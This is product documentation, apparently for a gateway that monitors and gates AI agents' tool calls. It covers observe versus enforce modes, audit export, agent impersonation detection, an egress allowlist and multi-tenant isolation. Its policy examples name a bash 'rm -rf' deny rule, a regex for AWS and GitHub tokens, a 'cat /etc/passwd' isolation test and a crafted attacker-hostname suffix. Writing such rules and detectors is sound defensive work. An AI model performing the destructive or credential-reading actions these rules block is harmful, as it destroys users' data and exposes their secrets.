`Deny`	Action blocked; error returned	Action proceeds; `dry_run: true` shadow event written to the audit log
`Redact`	Payload sanitised	Unredacted payload forwarded; shadow event written
`RequiresApproval`	Action halts pending review	Action proceeds; shadow event written

Every shadow event carries the full decision context: the decision that would have been applied (shadow_decision), the reason that would have been returned (shadow_reason), and a dry_run: true flag the audit consumer can filter on.
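The decision table can be expressed as a function from (mode, decision) to an outcome. This is a sketch under assumptions: `Outcome` and `apply` are illustrative names, the `disabled` mode is left out because the table does not describe it, and a `Redact` in enforce mode is assumed to proceed with a sanitised payload.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Decision {
    Allow,
    Deny,
    Redact,
    RequiresApproval,
}

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Mode {
    Enforce,
    Observe,
}

#[derive(Debug, PartialEq, Eq)]
pub struct Outcome {
    pub proceeds: bool,     // does the action go ahead immediately?
    pub redacted: bool,     // is the payload sanitised first?
    pub shadow_event: bool, // is a dry_run: true audit event written?
}

/// What the gateway does once a policy decision has been computed.
pub fn apply(decision: Decision, mode: Mode) -> Outcome {
    match (mode, decision) {
        // Allow is identical in both modes.
        (_, Decision::Allow) => Outcome { proceeds: true, redacted: false, shadow_event: false },
        (Mode::Enforce, Decision::Deny) => Outcome { proceeds: false, redacted: false, shadow_event: false },
        (Mode::Enforce, Decision::Redact) => Outcome { proceeds: true, redacted: true, shadow_event: false },
        (Mode::Enforce, Decision::RequiresApproval) => Outcome { proceeds: false, redacted: false, shadow_event: false },
        // Observe: never block or redact, always record what would have happened.
        (Mode::Observe, _) => Outcome { proceeds: true, redacted: false, shadow_event: true },
    }
}
```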

Quick start — 5 steps

# 1. Author a policy in observe mode (zero risk to running agents)
cat > coding-team-sandbox.yaml << 'EOF'
name: coding-team-sandbox
enforcement_mode: observe       # ← the one new field

rules:
  - action: deny
    match:
      tool_name: bash
      command_pattern: "rm -rf"
  - action: redact
    match:
      output_contains_pattern: "(AKIA|ghp_)[A-Za-z0-9]+"
EOF

# 2. Apply the policy
aasm policy apply --file coding-team-sandbox.yaml

# 3. Run an agent under observe-mode governance
aasm run --observe claude --workspace .

# 4. After a few days, review what would have been blocked
aasm audit list --dry-run-only --since 7d

# 5. Confident the policy is right? Flip to live enforcement.
#    (GNU sed syntax; BSD/macOS sed needs `sed -i ''` instead of `sed -i`.)
sed -i 's/enforcement_mode: observe/enforcement_mode: enforce/' coding-team-sandbox.yaml
aasm policy apply --file coding-team-sandbox.yaml

Policy configuration

enforcement_mode is a top-level optional field on the policy document:

name: my-policy
enforcement_mode: observe       # "enforce" (default) | "observe" | "disabled"

rules: [ ... ]

When the field is omitted, the policy defaults to enforce — the pre-feature behaviour. Existing on-disk policies upgrade transparently.

Per-agent overrides via agent_overrides are also supported, so you can run a single experimental agent in observe mode while the rest of the team stays in live enforce:

name: coding-team-policy
enforcement_mode: enforce

agent_overrides:
  - agent_glob: "experimental-*"
    enforcement_mode: observe

Resolution order (highest priority first):

Per-agent override — agent_overrides block in the policy YAML, or enforcement_mode on the agent’s RegisterAgent RPC payload.
Policy document default — the top-level enforcement_mode field.
Server-wide default — enforce.
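The resolution order above amounts to a chain of fallbacks. The sketch below makes several assumptions that the text does not confirm: the glob matcher supports only a single trailing `*`, the first matching override wins, and `AgentOverride` and `resolve_mode` are illustrative names.

```rust
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Mode {
    Enforce,
    Observe,
    Disabled,
}

pub struct AgentOverride {
    pub agent_glob: String,
    pub mode: Mode,
}

/// Minimal glob: a single trailing `*` matches any suffix; anything
/// else must match exactly. (Assumed for this sketch only.)
fn glob_matches(glob: &str, agent_id: &str) -> bool {
    match glob.strip_suffix('*') {
        Some(prefix) => agent_id.starts_with(prefix),
        None => glob == agent_id,
    }
}

/// Per-agent override, then policy default, then server-wide `enforce`.
pub fn resolve_mode(
    agent_id: &str,
    overrides: &[AgentOverride],
    policy_default: Option<Mode>,
) -> Mode {
    overrides
        .iter()
        .find(|o| glob_matches(&o.agent_glob, agent_id))
        .map(|o| o.mode)
        .or(policy_default)
        .unwrap_or(Mode::Enforce)
}
```

With the `coding-team-policy` example, `experimental-agent-001` resolves to observe mode while every other agent stays in enforce mode.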

CLI reference

`aasm run --observe`

Launches a managed AI dev tool with observe-mode governance for the duration of the session.

# Boolean shorthand — most common case
aasm run --observe claude --workspace .

# Explicit form — interchangeable with the above
aasm run --enforcement-mode observe claude --workspace .

# Disabled mode — only valid in hermetic test environments
aasm run --enforcement-mode disabled codex --workspace .

# Combine with --dry-run to preview the launch without executing the tool
aasm run --observe --dry-run claude --workspace .

When observe mode is active, a one-time banner prints to stderr ahead of any tool output:

⚠️  [AAASM] Running in sandbox/observe mode.
    Policy decisions are recorded but NOT enforced.
    Review captured events: aasm audit list --dry-run-only

The child process inherits AA_ENFORCEMENT_MODE=observe in its environment so tools that env-sniff (or downstream wrappers) can surface their own observe-mode badge.

--observe and --enforcement-mode are mutually exclusive — passing both fails fast at clap-parse time.

`aasm audit list --dry-run-only`

Filters the audit log to shadow events only:

# Show shadow events from the last 24h
aasm audit list --dry-run-only --since 24h

# Compose with other filters
aasm audit list --dry-run-only --since 7d --agent "codex-*"

# Machine-readable output for CI gates
aasm audit list --dry-run-only --format json

The flag is exclusive: by default aasm audit list HIDES shadow events so operators don’t see them mixed with live decisions; --dry-run-only flips that to show ONLY shadow events.

SDK usage

All three SDKs expose the same posture surface. Pass an enforcement_mode (Python / Go) or enforcementMode (Node.js) at agent registration:

Python

from agent_assembly import init_assembly

ctx = init_assembly(
    gateway_url="http://localhost:8080",
    api_key="...",
    agent_id="experimental-agent-001",
    enforcement_mode="observe",   # "enforce" | "observe" | "disabled"
)

The parameter is keyword-only; the type is Literal["enforce", "observe", "disabled"]. Omitting it preserves the pre-feature wire shape (the gateway applies its server-side enforce default).

Node.js / TypeScript

import { initAssembly, type EnforcementMode } from "@agent-assembly/sdk";

const ctx = await initAssembly({
  gatewayUrl: "http://localhost:8080",
  apiKey: "...",
  agentId: "experimental-agent-001",
  enforcementMode: "observe",   // 'enforce' | 'observe' | 'disabled'
});

The EnforcementMode union narrows at compile time; runtime validation catches typos from JS / JSON-config / dynamic-input callers with a RangeError.

Go

import "github.com/agent-assembly/go-sdk/assembly"

a, err := assembly.Init(ctx,
    assembly.WithGatewayURL("http://localhost:8080"),
    assembly.WithAPIKey("..."),
    assembly.WithSelfAgentID("experimental-agent-001"),
    assembly.WithEnforcementMode(assembly.EnforcementModeObserve),
)

assembly.EnforcementMode is a string-typed alias; the empty zero value omits the field from the registration body, preserving pre-feature wire shape.

CI integration — the policy-regression gate

A common observe-mode use case: gate every PR on “would my policy change block any existing agent workflow?”

# .github/workflows/policy-regression.yml
jobs:
  policy-regression:
    steps:
      - name: Run agent under observe-mode governance
        run: aasm run --observe codex -- codex "refactor src/auth.py"

      - name: Fail the PR on any would-be deny
        run: |
          BLOCKS=$(aasm audit list --dry-run-only --format json \
                   | jq '[.[] | select(.shadow_decision == "deny")] | length')
          if [ "$BLOCKS" -gt 0 ]; then
            echo "Policy regression: $BLOCKS actions would be blocked"
            aasm audit list --dry-run-only --format table
            exit 1
          fi

The exclusive-filter semantic of --dry-run-only means this gate doesn’t pick up unrelated live-enforcement events from other agents on the same gateway.
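
If jq is not available on the runner, the same count can be computed in a few lines of Python. This is a sketch under the same assumption the jq filter makes: that --format json emits a JSON array of event objects carrying a shadow_decision field. The sample events are made up for illustration.

```python
import json


def count_would_be_denies(audit_json: str) -> int:
    """Count shadow events whose would-be decision is "deny"."""
    events = json.loads(audit_json)  # assumed: a JSON array of event objects
    return sum(1 for event in events if event.get("shadow_decision") == "deny")


# Illustrative input only; real events carry many more fields.
sample = json.dumps([
    {"shadow_decision": "deny"},
    {"shadow_decision": "redact"},
    {"shadow_decision": "deny"},
])
blocks = count_would_be_denies(sample)
print(f"Policy regression: {blocks} actions would be blocked")
```

In a workflow step, the function would be fed the captured output of aasm audit list --dry-run-only --format json and the step would exit non-zero when the count is above zero.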

Dashboard

The dashboard exposes a SandboxSummaryCard component that renders the per-policy observe-mode aggregates:

┌─ SANDBOX SUMMARY ────────────────────────────────┐
│ coding-team-sandbox (last 24h)                    │
│                                                   │
│  47        12         3                           │
│  Would-be  Would-be   Would-be                    │
│  denies    redactions pending approvals           │
│                                                   │
│  Top matched rule: block-bash-rm-rf (31×)         │
│                                                   │
│  [View all events]  [Export CSV]  [Enable live →] │
└───────────────────────────────────────────────────┘

The card is rendered in amber. The colour is intentional: it contrasts with the dashboard’s red (live-deny) and green (live-allow) tokens so an operator can tell at a glance whether they’re looking at observe-mode aggregates or live enforcement data.

Status (2026-05): the card primitive is shipped (AAASM-1563). The full integration — wiring it into Policy detail, the audit-log toggle, the amber row badge, and the “Enable live enforcement” action — is tracked under AAASM-1911 and depends on aa-api surface changes that aren’t in this release.

Graduating to live enforcement

Once you’ve reviewed the shadow events and tuned the policy:

Inspect the most-common would-be violations:

aasm audit list --dry-run-only --since 7d --format json \
  | jq 'group_by(.shadow_decision) | map({decision: .[0].shadow_decision, count: length})'

Adjust the policy — tighten matchers that fired too eagerly, relax ones that blocked legitimate work.
Re-apply in observe mode for another short window to confirm the tuned policy behaves as expected.

Flip to enforce:

enforcement_mode: enforce

aasm policy apply --file my-policy.yaml

The cutover is instantaneous from the next CheckAction call onward — no agent restart required. Already-in-flight actions evaluated before the swap keep their original posture.

FAQ

Does observe mode affect performance? No measurable difference. The rule pipeline runs identically; the only added work is writing the shadow audit event when a non-Allow decision would have fired. That’s the same audit-write path live enforcement already uses, so the per-request cost is dominated by the rule evaluation itself.

Are redacted payloads ever stored in observe mode? No. The redact decision in observe mode forwards the unredacted payload to the agent (that’s the whole point — “what would have happened if we’d enforced”). The shadow audit event records that a redact rule matched, but neither the would-be redacted version nor the raw payload is persisted as a separate artefact. The audit pipeline’s existing PII-scanner pass still applies before any event is written.

Can I set observe mode per-agent without changing the policy? Yes — three ways:

CLI: aasm run --observe <tool> for the duration of that session.
SDK: pass enforcement_mode="observe" (Python), enforcementMode: "observe" (Node.js), or assembly.WithEnforcementMode(assembly.EnforcementModeObserve) (Go) when initialising the agent.
Policy YAML: agent_overrides block targeting an agent_glob.

The per-agent override always wins over the policy document’s default.

What happens to an agent that’s mid-action when I flip from observe to enforce? The action that’s already through CheckAction keeps its observe-mode disposition (allowed). The very next CheckAction call sees the new posture and starts enforcing. There’s no in-flight rollback.

Does the SDK have any guard against accidentally registering in observe mode? The SDK doesn’t second-guess the operator — observe mode is a deliberate posture. What the SDK does is:

Reject typos (e.g. "obesrve") with a clear error at init time
Default to “no opinion” (omits the field from the registration body) so a pre-feature SDK call gets the gateway’s server-side enforce default — only operators who explicitly opt in get observe mode

Can I use observe mode in production for a long-running agent? That’s the recommended pattern for new policies — run them in observe mode for a week, review the shadow events, then cut over. The audit log retention follows your normal retention policy, so the shadow events are queryable for as long as live events.

Compliance Export

aasm audit compliance-export produces a full-fidelity export of a per-session audit JSONL file for downstream regulatory review and SIEM ingestion. Unlike aasm audit export (which queries the live gateway through /api/v1/logs and emits a slim summary view), this command reads directly from the on-disk JSONL files written by the gateway’s AuditWriter, preserving the hash chain, credential findings, and delegation lineage that an auditor needs to verify integrity offline.

When to use

Use aasm audit compliance-export whenever the produced bytes will leave the gateway operator’s trust boundary — for example:

Annual EU AI Act / SOC 2 evidence packs.
Continuous SIEM ingestion (Splunk, ELK, Datadog) where each entry is treated as one log line.
Cold-storage archives that must survive a future schema upgrade.

Use aasm audit export for the operational summary view (CSV / JSON array of the slim REST shape) when you only need a quick at-a-glance report and the consumer does not need the hash chain.

Output format

The default --format jsonl emits one ComplianceRecord per line. Each record carries:

Field	Meaning
`seq`	Monotonic sequence within the session.
`timestamp`	ISO 8601 UTC.
`event_type`	`ToolCallIntercepted`, `PolicyViolation`, etc.
`agent_id`, `session_id`	Hex-encoded 16-byte identifiers.
`payload`	Pre-serialised JSON of the decision context.
`previous_hash`, `entry_hash`	Hex-encoded SHA-256 anchors of the tamper-evident chain.
`credential_findings`	Detected credential kinds + byte offsets (never the raw secret).
`redacted_payload`	Post-redaction text when the gateway substituted secrets, `null` when clean.
`root_agent_id`, `parent_agent_id`, `team_id`, `delegation_reason`, `spawned_by_tool`, `depth`	Lineage fields when the originating entry recorded them.

--format json produces a pretty-printed JSON array of the same records for human review. --format csv produces a flat spreadsheet view with the regulator-relevant columns plus a credential_findings_count and a boolean redacted flag; the payload body and lineage are dropped from CSV to keep the file approachable in spreadsheet tools — use JSONL for full fidelity.

Common invocations

Export an entire session in JSONL to a file:

aasm audit compliance-export \
  --input  /var/lib/aa-gateway/audit/session-<hex>.jsonl \
  --format jsonl \
  --output-file ./session.jsonl

Restrict to PolicyViolation entries in the last 24 hours and write to stdout (pipe-friendly):

aasm audit compliance-export \
  --input      /var/lib/aa-gateway/audit/session-<hex>.jsonl \
  --event-type PolicyViolation \
  --since      24h

Generate an EU AI Act evidence pack with a regulatory header:

aasm audit compliance-export \
  --input      /var/lib/aa-gateway/audit/session-<hex>.jsonl \
  --format     jsonl \
  --compliance eu-ai-act \
  --output-file ./eu-ai-act-evidence.jsonl

The --compliance header lines begin with # so JSONL ingestors that treat # as a comment skip them automatically; ingestors that do not should be configured to strip the header band on the way in.
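
For an ingestor that does not treat # as a comment, stripping the header band is a short pre-processing step. The sketch below assumes only what is stated above (header lines start with #, every other non-empty line is one JSON record); iter_compliance_records is a hypothetical helper name.

```python
import json
from typing import Iterable, Iterator


def iter_compliance_records(lines: Iterable[str]) -> Iterator[dict]:
    """Yield one parsed record per JSONL line, skipping '#' header lines."""
    for line in lines:
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank line or --compliance header band
        yield json.loads(stripped)
```

Because it takes any iterable of strings, the helper works equally on an open file handle or on lines read from stdin.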

Verifying the export

The export carries the same hash chain as the source JSONL. To verify chain integrity offline, run:

aasm audit verify-chain /var/lib/aa-gateway/audit/session-<hex>.jsonl

verify-chain consumes the raw on-disk file rather than the export, so the verifier sees exactly the bytes the gateway wrote. An auditor with the export and a SHA-256 implementation can independently re-hash each record’s canonical input (see the audit module documentation for the canonical bytes layout) and compare against the embedded entry_hash.
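
A lighter check that needs no knowledge of the canonical bytes layout is to confirm that the records link up. The sketch below does not re-hash anything and is not a substitute for verify-chain. It assumes that each record's previous_hash repeats the entry_hash of the record before it and that seq strictly increases; first_broken_link is a hypothetical name.

```python
from typing import List, Optional


def first_broken_link(records: List[dict]) -> Optional[int]:
    """Return the index of the first record that breaks the chain, else None."""
    for index in range(1, len(records)):
        previous, current = records[index - 1], records[index]
        # Assumption: previous_hash repeats the prior record's entry_hash.
        if current["previous_hash"] != previous["entry_hash"]:
            return index
        # Assumption: "monotonic" means strictly increasing seq values.
        if current["seq"] <= previous["seq"]:
            return index
    return None
```

A None result only shows the export is internally consistent; proving that each entry_hash is correct still requires re-hashing the canonical input.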

Security invariants

The export never carries raw credential values. credential_findings records only kind, offset, and the [REDACTED:<Kind>] label.
redacted_payload (when present) is the scanner’s substitution output, with raw secret bytes already replaced by [REDACTED:<Kind>] markers.
payload retains the original (pre-redaction) string only when the source entry did so; the gateway’s default policy is to replace payload with redacted_payload on persistence when findings exist, so by default the export carries no raw secret. Operators who pipe pre-redaction payloads downstream do so explicitly via configuration.

Last updated: 2026-05-25 by Chisanan232

Agent-to-Agent Identity (Zero-trust A2A)

Agent Assembly enforces a zero-trust posture on every agent-to-agent (A2A) tool dispatch: when agent A calls a tool exposed by agent B, the gateway verifies that the supplied credential_token matches the token registered for the claimed agent_id before any policy rule is evaluated. An impersonator (a third agent C presenting A’s agent_id with C’s own credential_token) is rejected at the front door and the attempt is recorded in the audit log.

How identity flows on an A2A call

agent A ── tool dispatch ──▶ agent B
                  │
                  ▼
         gateway PolicyService.CheckAction
                  │
                  ▼
   ┌───── validate_credential_token ─────┐
   │  registered token for agent_id      │
   │  matches the supplied token?        │
   └─────────────────┬───────────────────┘
                     │
        ┌────────────┴────────────┐
        ▼                         ▼
  Allow → evaluate policy   Reject → A2AImpersonationAttempted
                                    audit event + Deny response

agent_id in the request = the callee (B, the agent performing the action).
caller_agent_id in the request = the originator (A).
credential_token is validated against the callee’s registered token — caller_agent_id is an attestation by the callee, not a credential.

Audit events

Two AuditEventType variants make A2A traffic explicit in the chain:

Variant	Emitted when	Payload fields
`A2ACallIntercepted`	Allow decision on a request whose `caller_agent_id` differs from `agent_id`.	`caller_agent_id`, `callee_agent_id`, plus the usual `action_type`, `decision`, `policy_rule`, `latency_us`.
`A2AImpersonationAttempted`	Pre-policy-eval rejection because `credential_token` is empty or does not match the registered token for the claimed `agent_id`.	`claimed_agent_id`, `credential_token_present` (bool), `reason`, `policy_rule = "a2a_identity_verification"`.

Single-agent calls (no caller_agent_id, or caller equals callee) keep emitting the existing ToolCallIntercepted / PolicyViolation variants — nothing changes for non-A2A traffic.

Rejection rules

The gateway rejects before policy evaluation when:

The claimed agent_id is registered AND the supplied credential_token is empty → Deny with reason "missing credential token".
The claimed agent_id is registered AND the supplied credential_token is non-empty but does not match the registered token → Deny with reason "credential token mismatch".

When the claimed agent is not registered, the gateway skips identity validation and lets the policy engine decide (this preserves the lightweight detection-slice fixtures that bypass the registry entirely). To opt into strict validation for a specific agent, register it via the AgentRegistry — that’s the activation gesture.
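
The three outcomes above can be sketched as a single function. This is an illustration of the rules as documented, not the gateway's code: identity_gate and the plain dict standing in for the AgentRegistry are hypothetical, and the constant-time comparison is a choice made for this sketch.

```python
import hmac
from typing import Dict, Optional


def identity_gate(
    registered_tokens: Dict[str, str], agent_id: str, credential_token: str
) -> Optional[str]:
    """Return a deny reason, or None when the request may proceed to policy."""
    expected = registered_tokens.get(agent_id)
    if expected is None:
        return None  # unregistered agent: validation skipped, policy decides
    if not credential_token:
        return "missing credential token"
    # Constant-time comparison; an assumption of this sketch, not a documented detail.
    if not hmac.compare_digest(expected.encode(), credential_token.encode()):
        return "credential token mismatch"
    return None
```

Returning None for both "unregistered" and "token matches" mirrors the text: in either case the policy engine, not the identity gate, makes the final decision.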

Operator visibility

Use the existing audit tooling to surface A2A activity:

# All A2A allows in the last hour
aasm audit list --since 1h --event-type A2ACallIntercepted

# Rejected impersonation attempts (security investigation)
aasm audit list --event-type A2AImpersonationAttempted

# Compliance export covering A2A traffic specifically
aasm audit compliance-export \
  --input      /var/lib/aa-gateway/audit/session-<hex>.jsonl \
  --event-type A2ACallIntercepted \
  --format     jsonl \
  --output-file ./a2a-traffic.jsonl

SDK expectations

When you build an A2A dispatch helper in your SDK, populate the CheckActionRequest like this:

Field	Set to
`agent_id`	The callee (the agent that will execute the tool).
`credential_token`	The callee’s registered token.
`caller_agent_id`	The originator of the dispatch, attested by the callee.

The Python / Node / Go SDKs ship A2A helpers that wrap this for you. For framework-level integrations that build CheckActionRequest directly, the new field is optional and proto3-additive — single-agent SDKs that don’t populate it continue working unchanged.

What does not change

Single-agent tool calls — no behavioural change, no new audit events.
The credential validation is scoped to registered agents — bypassing the registry continues to be the recommended path for in-process tests and CI fixtures that don’t model identity.
The policy engine — A2A enforcement is a pre-evaluation gate, not a new policy clause; existing rules still apply once the call passes identity validation.

Last updated: 2026-05-25 by Chisanan232

Tool Execution Sandbox — Network Egress

Agent Assembly’s Tool Execution Sandbox enforces a network allowlist on outbound traffic from sandboxed tools: when a tool tries to CONNECT to a host that is not on the allowlist, the proxy returns HTTP 403 before any upstream dial and emits an audit event recording the blocked egress. This is the network half of spec highlight ④ (Tool Execution Sandbox); the filesystem-isolation half is tracked under AAASM-1965.

Configuration

The allowlist is configured on the aa-proxy process via the AA_PROXY_NETWORK_ALLOWLIST environment variable, as a comma-separated list of host patterns. An empty value means “no allowlist filter”, and leaving the variable unset preserves the pre-AAASM-1943 default-open posture.

export AA_PROXY_NETWORK_ALLOWLIST='api.openai.com,*.anthropic.com,*.googleapis.com'
aa-proxy run

Equivalent policy-DSL form (operator-facing documentation; the proxy reads from the env var today, with policy-DSL → proxy-config sync tracked under the AAASM-1232 closeout matrix):

apiVersion: agent-assembly.dev/v1alpha1
kind: GovernancePolicy
metadata:
  name: prod-egress
  version: "1.0.0"
spec:
  network:
    allowlist:
      - api.openai.com
      - "*.anthropic.com"
      - "*.googleapis.com"

Pattern grammar

The same matcher (aa_core::policy::is_host_allowed_by_egress_allowlist) is used by the proxy enforcement path and the gateway policy DSL. The grammar is intentionally narrow:

Pattern	Matches	Does NOT match
`api.openai.com` (exact)	`api.openai.com` (case-insensitive)	`chat.openai.com`, `openai.com`, `attackerapi.openai.com`
`*.openai.com` (leftmost-label wildcard)	`api.openai.com`, `chat.openai.com`, `a.b.openai.com`	`openai.com` (bare), `evil.openai.com.attacker.net` (suffix attack)
`*` (universal — escape hatch)	every host	—

No mid-label *, no character classes, no full POSIX glob. Allowlist patterns that look more permissive than they are have historically been the source of egress-rule misconfigurations; the narrow grammar lets operators reason about every pattern at a glance.

The attacker-crafted-suffix case (evil.openai.com.attacker.net against *.openai.com) is a classic confusion attack: the attacker hopes a permissive glob would match. The narrow grammar rejects it.
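
The grammar is small enough to restate in a few lines. The sketch below is a Python re-statement of the table for illustration, not the aa_core matcher itself; parse_allowlist and egress_permitted are hypothetical names, and treating an empty list as "no filter" follows the Configuration section.

```python
from typing import List


def parse_allowlist(raw: str) -> List[str]:
    """Split a comma-separated allowlist value into lowercase patterns."""
    return [part.strip().lower() for part in raw.split(",") if part.strip()]


def egress_permitted(host: str, patterns: List[str]) -> bool:
    """Apply the three documented forms: exact, '*.suffix', and '*'."""
    if not patterns:
        return True  # empty allowlist: no filter (default-open)
    host = host.lower()
    for pattern in patterns:
        if pattern == "*":
            return True
        if pattern.startswith("*."):
            suffix = pattern[1:]  # keep the leading dot, e.g. ".openai.com"
            # The dot stops the bare domain and crafted suffixes from matching;
            # the length check requires at least one character before the dot.
            if host.endswith(suffix) and len(host) > len(suffix):
                return True
        elif host == pattern:
            return True
    return False
```

Keeping the leading dot in the suffix comparison is what defeats the evil.openai.com.attacker.net case: that host ends in .attacker.net, not .openai.com.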

Audit events

Both the allow and deny CONNECT paths emit PipelineEvent::Audit events on the proxy’s broadcast channel. The deny path additionally returns HTTP 403 Forbidden\r\nContent-Length: 0\r\n\r\n to the sandboxed tool, which sees a connection refusal at its language-level HTTP client.

Audit reviewers can correlate blocked-egress events to source tools via the existing aasm logs / aasm audit list tooling. The audit payload carries the target host so operators can spot patterns (e.g. a tool repeatedly trying to reach a command-and-control (C2) server).

# Recent denied CONNECT attempts
aasm logs --since 1h --grep "denied by network allowlist"

# Compliance export of all network-policy violations
aasm audit compliance-export \
  --input      /var/lib/aa-gateway/audit/session-<hex>.jsonl \
  --event-type PolicyViolation \
  --format     jsonl \
  --output-file ./network-violations.jsonl

What this does NOT cover (deferred to AAASM-1965)

This page documents the network-egress half of spec highlight ④. The filesystem-isolation half (“cat /etc/passwd from inside a sandboxed tool blocked / redacted”) requires a WASM/WASI sandbox runtime that doesn’t yet exist in the repo. Filed under AAASM-1965 as a Story-point-8 follow-up:

aa-wasm extended with wasmtime + WASI preview 1 host handlers.
ToolRegistry distinguishing WASM-runnable tools from native / shell tools.
Filesystem allowlist enforcement returning EACCES for paths outside the sandbox root.
E2E tests for the cat /etc/passwd denial path.

The ST-W ignored placeholder in aa-integration-tests/tests/e2e_tool_sandbox.rs::st_w_1_filesystem_isolation_for_sandboxed_tools contains the exact assertion plan the follow-up will fill in.

Last updated: 2026-05-25 by Chisanan232

Org-Tier Isolation (Multi-Tenancy)

Agent Assembly enforces a three-tier isolation hierarchy — Org / Team / Agent — so a single gateway can safely host workloads from multiple tenants. AAASM-1524 covers the Agent and Team tiers; this guide describes the Org tier added in AAASM-2008.

What the Org tier guarantees

When agents are registered with a non-empty proto.AgentId.org_id, the gateway enforces the following invariants:

Surface	Org-tier behaviour
Audit log	Every audit entry carries the originating agent’s `org_id` on `Lineage`. `GET /api/v1/logs?org_id=X` filters to a single tenant.
Topology	`GET /api/v1/topology/overview?org_id=X` returns only X’s agents. The registry maintains an `org_index` secondary index for O(members) lookup.
Credential validation	An agent registered in Org A presenting its valid token but claiming `agent_id.org_id = "B"` is rejected with `A2AImpersonationAttempted`. The registry’s credential reverse-index catches cross-org reuse before any policy evaluation.
Policy scope	A policy with `scope: org:<id>` cascades only for agents in that org. (Requires the multi-document loader from AAASM-2023 — partial today.)
Budget	Every Org owns an independent spend envelope on the `BudgetTracker.org_budgets` map. `record_cost` rolls each charge into the agent’s `org_id` and enforces `org_daily_limit_usd` / `org_monthly_limit_usd` set via policy YAML or the `with_org_*_limit` builders. Exhausting one Org’s envelope never affects another.

How to set up multi-tenancy

import os

from agent_assembly import init_assembly

init_assembly(
    gateway="grpc://gateway:50051",
    agent_id={
        "org_id":   "acme",
        "team_id":  "platform",
        "agent_id": "research-bot-001",
    },
    credential_token=os.environ["AA_CREDENTIAL"],  # token issued at registration
)

The same convention applies via the Node and Go SDKs and via direct PolicyService.CheckAction calls — the proto AgentId triple is the canonical identity.

Querying by Org

Audit log

# Browser / curl
curl 'http://gateway/api/v1/logs?org_id=acme&per_page=50'

# Compliance export covering one org's audit trail
aasm audit compliance-export \
  --input      /var/lib/aa-gateway/audit/session-<hex>.jsonl \
  --org-id     acme \
  --format     jsonl \
  --output-file ./acme-audit.jsonl

Audit entries written before the agent was registered with an org_id (or by lightweight test fixtures that bypass the registry) carry org_id = None on Lineage and never match an explicit org_id filter. This is intentional — multi-tenancy isolation requires explicit Org tagging on the entry at write time.

Topology

curl 'http://gateway/api/v1/topology/overview?org_id=acme'

The overview endpoint scopes via AgentRegistry::org_members(oid). The other topology endpoints (tree, team, lineage, stats) accept the org_id query parameter but currently ignore it — the next ticket in the Org-tier rollout will wire each handler.

Cross-org credential reuse detection

When an agent in Org A presents its credential but claims agent_id.org_id = "B", the gateway:

Computes the registry key from the claimed {org_id, team_id, agent_id} triple. Because org_id is part of the hash, the claimed key differs from the agent’s actual registration key.
Looks up the claimed key — fails (no agent registered there).
Looks up the supplied credential_token in the reverse index — finds the actual owner.
Detects the mismatch, returns Deny with reason "credential token registered to a different agent", and emits an A2AImpersonationAttempted audit event with claimed_org_id in the payload.

A reviewer searching aasm audit list --event-type A2AImpersonationAttempted sees these attempts grouped by the org the attacker tried to claim.
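
The four steps can be sketched with two dictionaries: a forward map from the identity triple to its token, and a reverse index from token to owner. This is a toy model for illustration only. The Registry class and its method names are hypothetical, and the tuple is used directly as the key instead of the hash the real registry computes.

```python
from typing import Dict, Optional, Tuple

AgentKey = Tuple[str, str, str]  # (org_id, team_id, agent_id)


class Registry:
    """Toy registry with a forward map and a credential reverse index."""

    def __init__(self) -> None:
        self.token_by_key: Dict[AgentKey, str] = {}
        self.key_by_token: Dict[str, AgentKey] = {}

    def register(self, key: AgentKey, token: str) -> None:
        self.token_by_key[key] = token
        self.key_by_token[token] = key

    def cross_org_deny_reason(self, claimed: AgentKey, token: str) -> Optional[str]:
        """Return the deny reason for a reused credential, else None."""
        if claimed in self.token_by_key:
            return None  # claimed key exists: the normal token check applies
        owner = self.key_by_token.get(token)  # reverse-index lookup
        if owner is not None and owner != claimed:
            return "credential token registered to a different agent"
        return None
```

Because org_id is part of the key, changing only the org in the claim is enough to miss the forward map and fall through to the reverse-index check.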

Configuring Org-tier budget limits

Operator-facing knobs live in the budget: section of any Global-scoped policy document:

budget:
  daily_limit_usd:        10000.0   # global cap across all orgs
  monthly_limit_usd:      250000.0
  org_daily_limit_usd:    1000.0    # AAASM-2022 — per-org daily cap
  org_monthly_limit_usd:  25000.0   # AAASM-2022 — per-org monthly cap
  timezone: "UTC"
  action_on_exceed: deny

Semantics:

org_daily_limit_usd / org_monthly_limit_usd are uniform per-Org caps — the same envelope applies to every Org that records spend. Cross-Org isolation comes from the tracker maintaining an independent BudgetState per org_id, not from per-Org-customised limits.
Enforcement order in record_cost is global → org → team → agent, with monthly checked before daily within each tier. The first tier whose limit is exceeded returns BudgetStatus::LimitExceeded and the deny is recorded.
Limits enter the tracker via the with_org_daily_limit / with_org_monthly_limit builders during policy load. Restoring from a persisted snapshot re-applies limits via the same path, but the org_budgets map is empty on first restore until the migration in the AAASM-2022 follow-up lands.
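
The check order can be sketched as two nested loops. This is a simplified model, not the BudgetTracker: first_exceeded is a hypothetical name, the caller is assumed to have already selected the spend state for the agent's own org and team, and comparing "spent plus cost" against the limit with a strict greater-than is an assumption of the sketch.

```python
from typing import Dict, Optional, Tuple

TIERS = ("global", "org", "team", "agent")  # documented enforcement order
PERIODS = ("monthly", "daily")              # monthly is checked before daily


def first_exceeded(
    spent: Dict[Tuple[str, str], float],
    limits: Dict[Tuple[str, str], float],
    cost_usd: float,
) -> Optional[Tuple[str, str]]:
    """Return the first (tier, period) the charge would push over its limit."""
    for tier in TIERS:
        for period in PERIODS:
            limit = limits.get((tier, period))
            if limit is None:
                continue  # no limit configured for this tier and period
            # Assumption: a charge is over budget when spent + cost > limit.
            if spent.get((tier, period), 0.0) + cost_usd > limit:
                return (tier, period)
    return None
```

With the limits from the YAML above and 990 USD already spent by an org today, a 20 USD charge returns ("org", "daily"); the global tier is checked first but has headroom.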

Observing per-Org spend

// In-process accessor:
let acme_spent_usd = budget.org_state("acme").map(|s| s.spent_usd);

The dashboard / CLI surfaces for aasm budget status --org <id> are queued under AAASM-1232 follow-up subtasks.

Known gaps

Org-scoped policy E2E: PolicyEngine::load_from_file doesn’t populate the scope_index, so scope: org:<id> policies need a multi-document loader — AAASM-2023.
Topology endpoints beyond overview: tree / team / lineage / stats accept the org_id query param but currently ignore it.
Persistence schema for Org-tier spend: the on-disk snapshot does not yet carry the org_budgets map; a restored tracker starts with empty Org state.

